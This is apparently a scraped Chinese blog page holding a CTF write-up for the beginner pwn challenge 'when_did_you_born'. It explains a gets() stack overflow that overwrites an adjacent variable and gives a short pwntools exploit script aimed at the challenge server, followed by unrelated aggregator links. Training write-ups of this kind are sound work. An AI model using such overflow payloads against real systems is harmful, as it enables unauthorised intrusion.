pwn when did you born - 代码天地

pwn when did you born

其他 2020-09-25 19:05:49 阅读次数: 0

栈溢出的题
题目来源:https://cgctf.nuptsast.com/challenges#Pwn
在这里插入图片描述
拖进IDA(64位）
分析一波代码，看到这个gets,应该是栈溢出了
首先，我们需要提供一个不是1926的值，然后，通过输入v4时的溢出来改v5的值为1926，就可以拿到flag了

在这里插入图片描述
接着计算偏移，v4为ebp-20h,v5为ebp-18h,差为8h,payload就出来了
下面写出脚本，运行即得flag

from pwn import *
sh = remote('ctf.acdxvfsvd.net',1926)
payload = 'a' * 0x8 + p64(1926)
sh.recvuntil("What\'s Your Birth?\n")
sh.sendline("1927")
sh.recvuntil("What\'s Your Name?\n")
sh.sendline(payload)
sh.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_45677731/article/details/104420924

pwn when did you born

18.9.16 PWN----When Did You Born

XCTF - pwn when_did_you_born - WP

攻防世界_pwn_when_did_you_born(萌新版)

[CTF-PWN]攻防世界新手村-when_did_you_born[wp]

攻防世界 | when_did_you_born

when_did_you_born--writeup

CGCTF_when_did_you_born

XCTF when_did_you_born write up

攻防世界--when_did_you_born5

when_did_you_born-瞟来的wp

攻防世界 when_did_you_born 的wp

cgctf when_did_you_born 栈溢出简单利用

Apache Unable to find the wrapper "https" - did you forget to enable it when you configured PHP?

You did not just do that

Did you mean...

When you are old

When You Believe

Did you mean..?解法

""does not name a type; did you mean""

django Did you forget to register or load this tag?

Did you mean to run dotnet SDK commands

And for “Why did you choose Ubuntu in the first place

change root password when you foreget ON Ubuntu

When You Believe ----- 惠特妮休斯顿(Whitney Houston)

When you hit a wall, just kick it in.

when you failed,the game is just beginning

What really happens when you navigate to a URL

Should you get a close look when you buy them?

(13)How to stay calm when you know you'll be stressed

今日推荐

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

最强开源大模型 Llama 3 上架 Gitee AI

虽然老乡鸡开源的不是代码，但背后的原因却让人很暖心

富文本编辑器 Quill 2.0 重磅发布，特性、可靠性与开发者体验大幅提升

周排行

使用Redis中间件解决商品秒杀活动中出现的超卖问题（使用Java多线程模拟高并发环境）

野指针及c++指针使用注意点

redis 3.0　新特性

(翻译)火狐操作系统javascript API

微信小程序开发入门

mysql数据查询之五子句(where、group by、having、order by和limit)

Codeforces Round #517 Div. 1翻车记

在caffe 中实现Generative Adversarial Nets（二）

企业级漏洞扫描工具

java byte数组与String互转

每日归档

更多

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)

2024-04-15(42)

2024-04-14(0)